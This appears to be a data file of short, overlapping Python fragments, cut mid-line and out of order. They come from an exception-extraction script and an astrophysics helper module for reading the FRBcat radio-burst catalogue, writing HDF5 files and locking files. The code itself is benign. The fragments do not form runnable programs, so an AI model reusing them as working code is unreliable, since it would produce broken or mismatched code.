"outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file:",
"with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as",
"ex_dict_keys: values = ex_dict[key] if len(values) < 2: continue print(key) for value in",
"= \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for",
"ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys",
"in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict",
"ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key] if len(values)",
"\"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\",",
"exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files",
"load_exceptions(filename) ex_dict = {} for exception in exceptions: if exception.exception not in ex_dict:",
"= \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\",",
"open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename):",
"print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__()",
"\"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions",
"fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\",",
"t.start() for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files:",
"open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file:",
"def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads = []",
"retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key] if",
"= {} for exception in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] =",
"chunks(files, threads) threads = [] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,))",
"= retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\")",
"exception in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return",
"import glob from pathlib import Path import os def extract_exceptions(files): for path in",
"in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\",",
"\"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs)",
"return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key",
"orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads = [] for",
"as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore')",
"import threading import glob from pathlib import Path import os def extract_exceptions(files): for",
"with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__() +",
"excs = retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\",",
"args=(chunk,)) threads.append(t) t.start() for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path",
"exceptions = load_exceptions(filename) ex_dict = {} for exception in exceptions: if exception.exception not",
"t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads: t.join() files =",
"values = ex_dict[key] if len(values) < 2: continue print(key) for value in values:",
"path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\",",
"\"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads =",
"ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values =",
"continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs =",
"in ex_dict_keys: values = ex_dict[key] if len(values) < 2: continue print(key) for value",
"lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with",
"encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions =",
"continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs:",
"errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename)"
] |
[
"corrupt nodes in your h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries",
"== 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ##",
"row[i_tau] == 'null' ) : continue if RM and ( row[i_RM] == 'null'",
"import sleep ## wrapper to write hdf5 files consistently def Write2h5( filename='', datas=[],",
"not in [telescopes_FRBcat[tele] for tele in telescopes] ) : continue if tau and",
"exceeded\" ) raise # TODO It would be nice to avoid an arbitrary",
"Returns -1 if no item satysfing the condition is found. >>> first( (1,2,3),",
"-1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in iterable",
"continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1]",
"i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope'",
"*args, **kwargs ): \"\"\" measure time taken to compute function \"\"\" def MeasureTime():",
"in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30:",
"f.__delitem__( key ) except: pass f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries",
"True, only return FRBs observed with temproal broadening print_number : boolean if True,",
"header == 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele]",
"== 'null' ) : continue if RM and ( row[i_RM] == 'null' )",
"func, *args, **kwargs ): \"\"\" measure time taken to compute function \"\"\" def",
"## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides the",
"> 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x",
"next(x for x in iterable if condition(x)) except: return -1 ## wrapper to",
"to same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno",
"hard because it is # unnecessary. This is mostly to help the user",
"as h5, numpy as np, yt, csv from time import time, sleep from",
": continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s,",
"i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs,",
"and time() > (start_lock_search + self._timeout): # Exceeded the user-specified timeout. print( \"timeout",
"here, but spinning # without a delay is also undesirable. sleep(0.1) def __exit__(self,",
"with open( frbcat_file, 'r') as f: reader = csv.reader( f ) header =",
"print( \"couldn't write \", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'),",
"unavailable raise elif self._timeout is not None and time() > (start_lock_search + self._timeout):",
"try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a",
"left ## if file is locked, code is paused until lock is released,",
"in telescopes] ) : continue if tau and ( row[i_tau] == 'null' )",
"self._fd = None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while",
"- t0 print( \"Running %s took %i minutes and %.1f seconds %s\" %",
"use with the `with` syntax. It will create/truncate/delete the lock file as necessary.\"\"\"",
"the locked file(s) ## file is locked when with starts until its left",
"sys, h5py as h5, numpy as np, yt, csv from time import time,",
"## \"locktest\" is a temporary file that tells whether the lock is active",
"[ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] )",
"try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError) as",
"array structured numpy.array containing values listed in FRBcat \"\"\" ### read all FRBs",
"item of the iterable. Returns -1 if no item satysfing the condition is",
"### print_number:True print number of extracted FRBs FRBs = [] with open( frbcat_file,",
"case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30: #try: with",
"numpy.array containing values listed in FRBcat \"\"\" ### read all FRBs from FRBcat",
"import sys, h5py as h5, numpy as np, yt, csv from time import",
"from writing to same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os,",
"lambda x: True): \"\"\" Returns the first item in the `iterable` that satisfies",
"if RM and ( row[i_RM] == 'null' ) : continue FRBs.append( tuple( [",
"paused until lock is released, then with is performed ''' def first(iterable, condition",
"i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm'",
"PreFRBLE.parameter import * from time import time def TimeElapsed( func, *args, **kwargs ):",
"### optional: read only those FRBs observed by telescope with RM and tau",
"sys.exit( 'Write2h5 needs list of datas and keys' ) ### small workaround to",
"0 i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header ==",
"= np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0]",
"os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based file",
"if 'null' in string: return float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM',",
"print number of extracted FRBs FRBs = [] with open( frbcat_file, 'r') as",
"filename. overwrite existing entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs list",
"\"{} took {} s\".format( func.__name__, time()-t0 ) ) return res return MeasureTime() from",
"raise # TODO It would be nice to avoid an arbitrary sleep here,",
"if condition(x)) except: return -1 ## wrapper to show time needed for some",
"time() - t0 print( \"Running %s took %i minutes and %.1f seconds %s\"",
"caution, might corrupt nodes in your h5 file. in that case, visit: ###",
"would be nice to avoid an arbitrary sleep here, but spinning # without",
"i_RM, i_tau, i_zs, i_tele] ## order must fit order of FRB_dtype for row",
"= timeout self._fd = None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search =",
"x: x % 2 == 0) 2 >>> first(range(3, 100)) 3 >>> first(",
") t = time() - t0 print( \"Running %s took %i minutes and",
"keys=[] ): \"\"\" conveniently write datas to keys in filename. overwrite existing entries",
"i_ID = 0 i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where(",
"list of considered telescopes, FRBs of other telescopes are ignored RM : boolean",
"i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit order of FRB_dtype for",
"# Lock acquired! return except (OSError, IOError) as ex: if ex.errno != errno.EAGAIN:",
"to allow for parallel computation. Use with caution, might corrupt nodes in your",
"FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\"",
"observed with temproal broadening print_number : boolean if True, print number of extractet",
"https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in iterable if condition(x)) except: return",
"return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ## flocker to keep parallel",
">>> first( (1,2,3), condition=lambda x: x % 2 == 0) 2 >>> first(range(3,",
"THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in iterable if",
"is active ## perform action on the locked file(s) ## file is locked",
"pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file that",
"time needed for some function ''' def HowLong( f, *args, print_additional='', **kwargs ):",
"file locking. Intended for use with the `with` syntax. It will create/truncate/delete the",
"\"\"\" t0 = time() ret = f( *args, **kwargs ) t = time()",
"'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header",
"2 == 0) 2 >>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x:",
"Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype",
"i_tau, i_zs, i_tele] ## order must fit order of FRB_dtype for row in",
"## if file is locked, code is paused until lock is released, then",
") return np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\" short",
"file is locked when with starts until its left ## if file is",
"Try to remove the lock file, but don't try too hard because it",
"__init__(self, path, timeout = None): self._path = path self._timeout = timeout self._fd =",
"= np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0 i_DM = np.where( header",
"Parameters ---------- telescopes : list list of considered telescopes, FRBs of other telescopes",
"the user-specified timeout. print( \"timeout exceeded\" ) raise # TODO It would be",
"filesystem. try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is",
"action on the locked file(s) ## file is locked when with starts until",
"\"\"\" short wrapper to decode byte-strings read from FRBcat \"\"\" if 'f' in",
"measure == 'RM': return FRBs['RM'] ## flocker to keep parallel processes from writing",
"* from time import time def TimeElapsed( func, *args, **kwargs ): \"\"\" measure",
"i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host'",
"'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in",
"data=data ) break #except: sleep(3e-2) tries += 1 pass else: print( \"couldn't write",
"flocker to keep parallel processes from writing to same file simultaneously ## provided",
"+ self._timeout): # Exceeded the user-specified timeout. print( \"timeout exceeded\" ) raise #",
"Exceeded the user-specified timeout. print( \"timeout exceeded\" ) raise # TODO It would",
"return MeasureTime() from time import sleep ## wrapper to write hdf5 files consistently",
"time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except",
"i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit'",
"in dtype: if 'null' in string: return float('NaN') return float(string) return string def",
"## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')]",
"values listed in FRBcat \"\"\" ### read all FRBs from FRBcat ### optional:",
") : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip(",
"It will create/truncate/delete the lock file as necessary.\"\"\" def __init__(self, path, timeout =",
"string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of FRBs in FRBcat",
"is not given, returns the first item of the iterable. Returns -1 if",
"open( frbcat_file, 'r') as f: reader = csv.reader( f ) header = np.array(next(reader))",
"with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file that tells whether the",
"`iterable` that satisfies the `condition`. If the condition is not given, returns the",
"tele in telescopes] ) : continue if tau and ( row[i_tau] == 'null'",
"to remove the lock file, but don't try too hard because it is",
"**kwargs ): \"\"\" wrapper to print the time needed to call function f",
"'Write2h5 needs list of datas and keys' ) ### small workaround to allow",
"0 while tries < 30: #try: with h5.File( filename, 'a' ) as f:",
") break #except: sleep(3e-2) tries += 1 pass else: print( \"couldn't write \",",
")[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where( header ==",
"no item satysfing the condition is found. >>> first( (1,2,3), condition=lambda x: x",
"('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False",
"np, yt, csv from time import time, sleep from PreFRBLE.file_system import * from",
"is released, then with is performed ''' def first(iterable, condition = lambda x:",
"is not None and time() > (start_lock_search + self._timeout): # Exceeded the user-specified",
"your h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while",
"float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of FRBs",
"header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope' )[0][0] i_s =",
"self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX |",
"FRB_dtype for row in reader: if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele]",
"'a' ) as f: for data, key in zip( datas, keys ): try:",
"listed in FRBcat \"\"\" ### read all FRBs from FRBcat ### optional: read",
"print( \"timeout exceeded\" ) raise # TODO It would be nice to avoid",
"): \"\"\" conveniently write datas to keys in filename. overwrite existing entries \"\"\"",
"np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0 i_DM = np.where( header ==",
"(start_lock_search + self._timeout): # Exceeded the user-specified timeout. print( \"timeout exceeded\" ) raise",
"#except: sleep(3e-2) tries += 1 pass else: print( \"couldn't write \", keys )",
"pass else: print( \"couldn't write \", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype",
"tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ]",
"to keys in filename. overwrite existing entries \"\"\" if type(keys) is str: sys.exit(",
"RM : boolean if True, only return FRBs observed with RM tau :",
"s\".format( func.__name__, time()-t0 ) ) return res return MeasureTime() from time import sleep",
"overwrite existing entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs list of",
")[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header ==",
"== 'RM': return FRBs['RM'] ## flocker to keep parallel processes from writing to",
"extracted FRBs FRBs = [] with open( frbcat_file, 'r') as f: reader =",
"keys' ) ### small workaround to allow for parallel computation. Use with caution,",
"elif self._timeout is not None and time() > (start_lock_search + self._timeout): # Exceeded",
"to write hdf5 files consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently",
"# Try to remove the lock file, but don't try too hard because",
"the iterable. Returns -1 if no item satysfing the condition is found. >>>",
"print_number=False ): \"\"\" read all FRBs in FRBcat, downloaded to frbcat_file Parameters ----------",
"## perform action on the locked file(s) ## file is locked when with",
"fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError) as ex:",
"key, data=data ) break #except: sleep(3e-2) tries += 1 pass else: print( \"couldn't",
"remove the lock file, but don't try too hard because it is #",
"for some function ''' def HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper",
"FRBcat \"\"\" if 'f' in dtype: if 'null' in string: return float('NaN') return",
"): \"\"\" read all FRBs in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes",
"It would be nice to avoid an arbitrary sleep here, but spinning #",
"== 'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where(",
"self._timeout is not None and time() > (start_lock_search + self._timeout): # Exceeded the",
"derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible interface",
"as f: for data, key in zip( datas, keys ): try: f[key][()] f.__delitem__(",
"whether the lock is active ## perform action on the locked file(s) ##",
"30: #try: with h5.File( filename, 'a' ) as f: for data, key in",
"code is paused until lock is released, then with is performed ''' def",
"returns measures of FRBs in FRBcat read with GetFRBcat() \"\"\" if measure ==",
"list list of considered telescopes, FRBs of other telescopes are ignored RM :",
"if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] )",
"tries = 0 while tries < 30: #try: with h5.File( filename, 'a' )",
"os.close(self._fd) self._fd = None # Try to remove the lock file, but don't",
"if file is locked, code is paused until lock is released, then with",
"%s took %i minutes and %.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional",
"### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30: #try: with h5.File( filename,",
"= time() - t0 print( \"Running %s took %i minutes and %.1f seconds",
": boolean if True, only return FRBs observed with temproal broadening print_number :",
"until lock is released, then with is performed ''' def first(iterable, condition =",
"continue if RM and ( row[i_RM] == 'null' ) : continue FRBs.append( tuple(",
"IOError) as ex: if ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise elif",
"took {} s\".format( func.__name__, time()-t0 ) ) return res return MeasureTime() from time",
"header = np.array(reader.next()) i_ID = 0 i_DM = np.where( header == 'rmp_dm' )[0][0]",
"i_zs, i_tele] ## order must fit order of FRB_dtype for row in reader:",
"syntax. It will create/truncate/delete the lock file as necessary.\"\"\" def __init__(self, path, timeout",
"with RM and tau ### print_number:True print number of extracted FRBs FRBs =",
"https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible interface to",
"simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides",
"-1 if no item satysfing the condition is found. >>> first( (1,2,3), condition=lambda",
"from FRBcat \"\"\" if 'f' in dtype: if 'null' in string: return float('NaN')",
") : continue if RM and ( row[i_RM] == 'null' ) : continue",
"func.__name__, time()-t0 ) ) return res return MeasureTime() from time import sleep ##",
"boolean if True, only return FRBs observed with RM tau : boolean if",
"in filename. overwrite existing entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs",
"return FRBs['RM'] ## flocker to keep parallel processes from writing to same file",
"released, then with is performed ''' def first(iterable, condition = lambda x: True):",
"of other telescopes are ignored RM : boolean if True, only return FRBs",
"extractet FRBs Returns ------- FRBs : array structured numpy.array containing values listed in",
"t0 print( \"Running %s took %i minutes and %.1f seconds %s\" % (f.__name__,",
"also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None #",
") ) return res return MeasureTime() from time import sleep ## wrapper to",
"import * from PreFRBLE.parameter import * from time import time def TimeElapsed( func,",
"None and time() > (start_lock_search + self._timeout): # Exceeded the user-specified timeout. print(",
">>> first( (1,2,3), condition=lambda x: x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition",
"and %.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional ) ) return ret",
"to show time needed for some function ''' def HowLong( f, *args, print_additional='',",
"avoid an arbitrary sleep here, but spinning # without a delay is also",
"condition(x)) except: return -1 ## wrapper to show time needed for some function",
"from time import time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import *",
"while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except (OSError,",
": list list of considered telescopes, FRBs of other telescopes are ignored RM",
"== 0) 2 >>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x: x",
"sleep ## wrapper to write hdf5 files consistently def Write2h5( filename='', datas=[], keys=[]",
"fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError) as ex: if ex.errno !=",
"for parallel computation. Use with caution, might corrupt nodes in your h5 file.",
"from __future__ import print_function import sys, h5py as h5, numpy as np, yt,",
"in [telescopes_FRBcat[tele] for tele in telescopes] ) : continue if tau and (",
"exists by examining the filesystem. try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\",",
"returns the first item of the iterable. Returns -1 if no item satysfing",
"2 >>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x: x > 9)",
"PreFRBLE.file_system import * from PreFRBLE.parameter import * from time import time def TimeElapsed(",
"print_number:True print number of extracted FRBs FRBs = [] with open( frbcat_file, 'r')",
"return np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\" short wrapper",
"downloaded to frbcat_file Parameters ---------- telescopes : list list of considered telescopes, FRBs",
"user see whether a lock # exists by examining the filesystem. try: os.unlink(self._path)",
"return FRBs observed with temproal broadening print_number : boolean if True, print number",
"that satisfies the `condition`. If the condition is not given, returns the first",
"def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to remove",
"function ''' def HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper to print",
"'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where( header",
"read all FRBs from FRBcat ### optional: read only those FRBs observed by",
"except (OSError, IOError) as ex: if ex.errno != errno.EAGAIN: # Resource temporarily unavailable",
"satysfing the condition is found. >>> first( (1,2,3), condition=lambda x: x % 2",
"but spinning # without a delay is also undesirable. sleep(0.1) def __exit__(self, *args):",
"from time import time def TimeElapsed( func, *args, **kwargs ): \"\"\" measure time",
"with h5.File( filename, 'a' ) as f: for data, key in zip( datas,",
"csv.reader( f ) header = np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0",
"= np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope' )[0][0]",
"def __init__(self, path, timeout = None): self._path = path self._timeout = timeout self._fd",
"raise elif self._timeout is not None and time() > (start_lock_search + self._timeout): #",
"the `iterable` that satisfies the `condition`. If the condition is not given, returns",
"file, but don't try too hard because it is # unnecessary. This is",
"condition=lambda x: x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return",
"measures of FRBs in FRBcat read with GetFRBcat() \"\"\" if measure == 'DM':",
"except: return -1 ## wrapper to show time needed for some function '''",
"needed for some function ''' def HowLong( f, *args, print_additional='', **kwargs ): \"\"\"",
"byte-strings read from FRBcat \"\"\" if 'f' in dtype: if 'null' in string:",
"h5py as h5, numpy as np, yt, csv from time import time, sleep",
"some function ''' def HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper to",
"order must fit order of FRB_dtype for row in reader: if telescopes and",
"key ) except: pass f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries +=",
") header = np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0 i_DM =",
"np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele",
"res = func( *args, **kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0 )",
"FRBs observed with RM tau : boolean if True, only return FRBs observed",
"# TODO It would be nice to avoid an arbitrary sleep here, but",
"= 0 while tries < 30: #try: with h5.File( filename, 'a' ) as",
"all FRBs from FRBcat ### optional: read only those FRBs observed by telescope",
"of datas and keys' ) ### small workaround to allow for parallel computation.",
"with temproal broadening print_number : boolean if True, print number of extractet FRBs",
"observed by telescope with RM and tau ### print_number:True print number of extracted",
"the lock file, but don't try too hard because it is # unnecessary.",
"wrapper to show time needed for some function ''' def HowLong( f, *args,",
"f \"\"\" t0 = time() ret = f( *args, **kwargs ) t =",
"tries < 30: #try: with h5.File( filename, 'a' ) as f: for data,",
"optional: read only those FRBs observed by telescope with RM and tau ###",
") def decode( string, dtype='U' ): \"\"\" short wrapper to decode byte-strings read",
"examining the filesystem. try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ##",
"of extractet FRBs Returns ------- FRBs : array structured numpy.array containing values listed",
"is performed ''' def first(iterable, condition = lambda x: True): \"\"\" Returns the",
"= [] with open( frbcat_file, 'r') as f: reader = csv.reader( f )",
"telescopes : list list of considered telescopes, FRBs of other telescopes are ignored",
"): \"\"\" measure time taken to compute function \"\"\" def MeasureTime(): t0 =",
"MeasureTime(): t0 = time() res = func( *args, **kwargs) print( \"{} took {}",
